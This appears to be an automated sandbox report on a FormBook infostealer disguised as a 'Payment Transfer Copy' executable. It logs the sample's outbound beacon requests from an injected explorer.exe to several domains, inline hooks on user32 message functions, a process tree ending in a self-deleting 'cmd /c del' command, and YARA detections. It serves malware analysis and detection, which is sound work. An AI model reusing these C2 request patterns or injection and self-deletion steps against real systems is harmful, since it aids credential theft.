Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:48:35.246251106 CET	5116	OUT	GET /blr/?OhNhA=iTLpEvItJY3C/iY0O/gMWVvFAW67iqJR4Qa3Cv5AKoajJvRVMc3YtK32u24rykRgHJga&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.jaemagreci.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:48:36.268591881 CET	5117	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 23 Feb 2021 08:48:35 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Upgrade: h2,h2c Connection: Upgrade, close Location: http://jaemagreci.com Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49739	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:48:54.032861948 CET	5136	OUT	GET /blr/?OhNhA=BbRt519gnWT2xWYUVSCsYiPJyU2bwfntJXr00JvtFds5dVCPZN8W3I64QGhm0Na3rvFo&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.sweetpopntreatz.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:48:54.174190044 CET	5137	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Tue, 23 Feb 2021 08:48:54 GMT Content-Type: text/html Content-Length: 275 ETag: "6031584e-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49740	198.52.105.123	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:49:16.624357939 CET	5138	OUT	GET /blr/?OhNhA=luzvcdoWPFwNnK5D3r055oflJ4B6PNqet6SFuGGCnSWn2ee+CnvcD8UF6pdBh9++nOVu&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.long9000.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:49:16.870922089 CET	5139	IN	HTTP/1.1 404 Not Found Server: nginx Date: Tue, 23 Feb 2021 08:44:23 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 63 31 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 31 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 32 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 68 33 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #4288ce; margin: 6px 0 0; font-weight: 400; } h3{ margin: 12px; font-size: 16px; font-weight: bold; } abbr{ cursor: help; text-
Feb 23, 2021 09:49:16.871021032 CET	5141	IN	Data Raw: 64 65 63 6f 72 61 74 69 6f 6e 3a 20 75 6e 64 65 72 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 2d 73 74 79 6c 65 3a 20 64 6f 74 74 65 64 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 Data Ascii: decoration: underline; text-decoration-style: dotted; } a{ color: #868686; cursor: pointer; } a:hover{ text-decoration: underline; } .line-error{
Feb 23, 2021 09:49:16.871046066 CET	5142	IN	Data Raw: 64 69 6e 67 3a 20 31 32 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 64 64 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 30 20 6e 6f 6e 65 3b Data Ascii: ding: 12px; border: 1px solid #ddd; border-bottom: 0 none; line-height: 18px; font-size:16px; border-top-left-radius: 4px; border-top-right-radius: 4px; font-f
Feb 23, 2021 09:49:16.871067047 CET	5143	IN	Data Raw: 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 Data Ascii: color: #333; height: 100%; display: inline-block; border-left: 1px solid #fff; font-size:14px; font-family: Consolas,"Liberation Mono",Courier,Verdana,""; }
Feb 23, 2021 09:49:16.871087074 CET	5145	IN	Data Raw: 20 20 20 20 63 6f 6c 6f 72 3a 20 23 63 63 63 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 65 78 63 65 70 74 69 6f 6e 2d 76 61 72 20 74 61 62 6c 65 20 74 62 6f 64 79 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 Data Ascii: color: #ccc; } .exception-var table tbody{ font-size: 13px; font-family: Consolas,"Liberation Mono",Courier,""; } .exception-var table td{ padding: 0 6px;
Feb 23, 2021 09:49:16.871104956 CET	5145	IN	Data Raw: 63 6f 6c 6f 72 3a 20 23 30 30 38 20 7d 20 20 2f 2a 20 61 20 6d 61 72 6b 75 70 20 74 61 67 20 6e 61 6d 65 20 2a 2f 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 61 74 6e 20 7b 20 63 6f 6c 6f 72 3a 20 23 36 30 36 20 Data Ascii: color: #008 } /* a markup tag name / pre.prettyprint .atn { color: #606 } / a markup attribute name / pre.prettyprint .atv { color: #080 } / a markup attribute value */ pre.prettyprint .dec, pre.prettyprint .var

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49748	185.199.108.153	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:49:37.345757961 CET	5531	OUT	GET /blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.soheilvaseghi.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:49:37.472671032 CET	5533	IN	HTTP/1.1 301 Moved Permanently Server: GitHub.com Content-Type: text/html Location: https://soheilvaseghi.com/blr/?OhNhA=9NQu4cm/N7DYOvYkOtDGizwfZS7YZZztEmXWW7fOjfXAYFPuQogNr8p6dLx09NPCIIrz&Yn=ybdDmfdPTbAT8L X-GitHub-Request-Id: 2C62:B000:9F860:ADCCB:6034C1A1 Content-Length: 162 Accept-Ranges: bytes Date: Tue, 23 Feb 2021 08:49:37 GMT Via: 1.1 varnish Age: 0 Connection: close X-Served-By: cache-hhn4039-HHN X-Cache: MISS X-Cache-Hits: 0 X-Timer: S1614070177.383340,VS0,VE84 Vary: Accept-Encoding X-Fastly-Request-ID: 28473c359bf380142872393ca46bb19149a93093 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.3	49752	176.74.27.137	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:49:57.812186003 CET	6008	OUT	GET /blr/?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.gannahealing.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:49:57.873881102 CET	6009	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 23 Feb 2021 08:49:57 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 343 Connection: close Location: http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L Cache-Control: max-age=172800 Expires: Thu, 25 Feb 2021 08:49:57 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 61 6e 6e 61 68 65 61 6c 69 6e 67 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 62 6c 72 3f 4f 68 4e 68 41 3d 31 44 36 63 73 66 61 44 44 37 67 34 74 33 51 39 46 38 4c 48 4e 57 69 47 46 71 6e 73 75 64 51 79 41 35 47 48 70 6c 2f 35 62 32 6e 44 4a 77 5a 49 6b 57 55 37 36 69 78 73 37 6a 41 62 4d 6c 76 6d 31 79 6d 59 26 61 6d 70 3b 59 6e 3d 79 62 64 44 6d 66 64 50 54 62 41 54 38 4c 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="http://www.gannahealing.com/public/blr?OhNhA=1D6csfaDD7g4t3Q9F8LHNWiGFqnsudQyA5GHpl/5b2nDJwZIkWU76ixs7jAbMlvm1ymY&Yn=ybdDmfdPTbAT8L">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.3	49753	198.27.88.111	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:50:18.432307005 CET	6010	OUT	GET /blr/?OhNhA=Y4Nqpa2r+tF7um99WXv6gSEpOHOatsVE8QqSeJqkcp8K3U81YoxyR3xnMLz5lVrsAPpR&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.olgadalila.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:50:18.584054947 CET	6010	IN	HTTP/1.1 502 Bad Gateway Server: nginx Date: Tue, 23 Feb 2021 08:50:18 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body bgcolor="white"><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49754	164.155.144.220	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Feb 23, 2021 09:50:39.257392883 CET	6011	OUT	GET /blr/?OhNhA=bjCfXUMydIGN0g8/5RwnbPPnLj5Or6e3tcQCgNEOQF7zRRnTIveAFITP4tBGYavfcP94&Yn=ybdDmfdPTbAT8L HTTP/1.1 Host: www.zomapa.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Feb 23, 2021 09:50:39.465549946 CET	6011	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Feb 2021 08:50:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a Data Ascii: 1.0

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xEA
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xEA
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8A 0xAE 0xEA
GetMessageA	INLINE	0x48 0x8B 0xB8 0x82 0x2E 0xEA

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe PID: 6512 Parent PID: 5600

General

Start time:	09:46:47
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
Imagebase:	0x7ffb73670000
File size:	716288 bytes
MD5 hash:	5F1C9C4A7BC24C3D39A5A3834BA7BB8E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.237553429.0000000002A11000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe PID: 6840 Parent PID: 6512

General

Start time:	09:46:55
Start date:	23/02/2021
Path:	C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
Imagebase:	0x7ffb73670000
File size:	716288 bytes
MD5 hash:	5F1C9C4A7BC24C3D39A5A3834BA7BB8E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3388 Parent PID: 6840

General

Start time:	09:46:57
Start date:	23/02/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff714890000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: explorer.exe PID: 6224 Parent PID: 3388

General

Start time:	09:47:11
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\explorer.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\explorer.exe
Imagebase:	0x330000
File size:	3611360 bytes
MD5 hash:	166AB1B9462E5C1D6D18EC5EC0B6A5F7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 4188 Parent PID: 6224

General

Start time:	09:47:15
Start date:	23/02/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe'
Imagebase:	0x1d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 1636 Parent PID: 4188

General

Start time:	09:47:15
Start date:	23/02/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Payment Transfer Copy of $274,876.00 for the invoice shipments.exe PID: 6512 Parent PID: 5600 Payment Transfer Copy of $274,876.00 for the invoice shipments.exeCOMMON

Executed Functions

Function 028D6B98, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 028D6BF8
GetCurrentThread.KERNEL32 ref: 028D6C35
GetCurrentProcess.KERNEL32 ref: 028D6C72
GetCurrentThreadId.KERNEL32 ref: 028D6CCB

Memory Dump Source

Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: a760883131c03152c03946671f984c76947d5ea4539f359061268c22d193ba21
Instruction ID: 0af98f319b7e4a833cb301a6f96e29b18fc3e13e142745085b75e4c01938fd2a
Opcode Fuzzy Hash: a760883131c03152c03946671f984c76947d5ea4539f359061268c22d193ba21
Instruction Fuzzy Hash: DE5166B8D006498FEB14CFA9D6487DEBBF4FF88314F208459E019A7290E774A948CF65

Uniqueness

Uniqueness Score: -1.00%

Function 028DDC2D, Relevance: 1.6, APIs: 1, Instructions: 138COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 028DDD8A

Memory Dump Source

Source File: 00000000.00000002.237430614.00000000028D0000.00000040.00000001.sdmp, Offset: 028D0000, based on PE: false

Similarity

API ID: CreateWindow
String ID:
